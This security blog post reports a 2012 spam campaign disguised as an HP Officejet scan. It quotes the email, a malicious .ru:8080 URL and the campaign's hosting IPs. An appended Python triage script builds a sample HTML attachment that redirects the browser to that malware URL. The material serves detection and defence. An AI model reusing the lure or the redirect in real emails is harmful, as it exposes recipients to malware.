The Latest in IT Security

“Scan from a Hewlett-Packard Officejet” spam / caskjfhlkaspsfg.ru

01 Mar 2012

Another malicious spam run, this time with an HTML attachment containing obfuscated code that leads to caskjfhlkaspsfg.ru.

Date:      Thu, 1 Mar 2012 09:43:50 +0530
From:      [email protected]
Subject:      Fwd: Re: Fwd: Scan from a Hewlett-Packard Officejet #603320
Attachments:     HP_Scan-27-499614.htm

Attached document was scanned and sent to you using a Hewlett-Packard HP SmartJet 4931F.

Sent by: ARLYNE
Pages : 9
Attachment Type: .HTM [Internet Explorer/Mozilla Firefox]

The malware is hosted at caskjfhlkaspsfg.ru:8080/images/aublbzdni.php. As with other recent .ru:8080 attacks, the domain is multihomed on a familiar set of IP addresses:

50.31.1.105 (Steadfast Networks, US)
69.60.117.183 (Colopronto, US)
78.107.82.98 (Corbina Telecom, Russia)
83.238.208.55 (Netia Telekom, Poland)
95.156.232.102 (Optimate-server, Germany)
96.125.168.172 (Websitewelcome, US)
111.93.161.226 (Tata Teleservices, India)
125.19.103.198 (Bharti Infotel, India)
128.134.57.112 (Kwangun University, Korea)
173.203.51.174 (Slicehost, US)
184.106.200.65 (Slicehost, US)
184.106.237.210 (Slicehost, US)
190.81.107.70 (Telemax, Peru)
199.204.23.216 (ECSuite, US)
200.169.13.84 (Century Telecom Ltda, Brazil)
209.114.47.158 (Slicehost, US)
210.56.23.100 (Commission For Science And Technology, Pakistan)
210.109.108.210 (Sejong Telecom, Korea)
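As an added example (not part of the original post), here is a small Python triage check that encodes the indicators quoted above: the "Scan from a Hewlett-Packard Officejet" subject, the .htm attachment, the campaign domain and hosting IPs, and the generic .ru:8080 URL pattern. The sample message is constructed inline and is not a real capture.

```python
import re
import email
from email import policy
from email.message import EmailMessage

# Indicators taken from the post: campaign domain and the addresses it is multihomed on.
CAMPAIGN_HOSTS = {"caskjfhlkaspsfg.ru"}
CAMPAIGN_IPS = {
    "50.31.1.105", "69.60.117.183", "78.107.82.98", "83.238.208.55",
    "95.156.232.102", "96.125.168.172", "111.93.161.226", "125.19.103.198",
    "128.134.57.112", "173.203.51.174", "184.106.200.65", "184.106.237.210",
    "190.81.107.70", "199.204.23.216", "200.169.13.84", "209.114.47.158",
    "210.56.23.100", "210.109.108.210",
}
SUBJECT_RE = re.compile(r"Scan from a Hewlett-Packard Officejet", re.I)
URL_RE = re.compile(r"https?://([^\s/:\"'<>]+)(?::(\d+))?(/[^\s\"'<>]*)?", re.I)

def classify_message(raw: str) -> list[str]:
    """Return the campaign indicators found in one RFC 822 message (empty = no match)."""
    msg = email.message_from_string(raw, policy=policy.default)
    hits = []
    if SUBJECT_RE.search(msg.get("Subject", "")):
        hits.append("subject")
    for part in msg.iter_attachments():
        if not (part.get_filename() or "").lower().endswith((".htm", ".html")):
            continue
        hits.append("htm-attachment")
        content = part.get_content()  # str for text/*, bytes if sent as octet-stream
        if isinstance(content, bytes):
            content = content.decode("utf-8", "replace")
        for host, port, _path in URL_RE.findall(content):
            if host in CAMPAIGN_HOSTS or host in CAMPAIGN_IPS:
                hits.append("known-host:" + host)
            elif host.endswith(".ru") and port == "8080":
                hits.append("ru-8080:" + host)
    return hits

def build_sample() -> str:
    """Constructed lookalike of the quoted spam (sender and body are made up)."""
    m = EmailMessage()
    m["From"] = "sender@example.invalid"
    m["Subject"] = "Fwd: Re: Fwd: Scan from a Hewlett-Packard Officejet #603320"
    m.set_content("Attached document was scanned and sent to you using a "
                  "Hewlett-Packard HP SmartJet 4931F.\n")
    html = ('<html><body><script>document.location="http://caskjfhlkaspsfg.ru'
            ':8080/images/aublbzdni.php";</script></body></html>')
    m.add_attachment(html, subtype="html", filename="HP_Scan-27-499614.htm")
    return m.as_string()
```

Feeding quarantined .eml files through classify_message gives a quick way to tag this campaign without executing the attachment.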

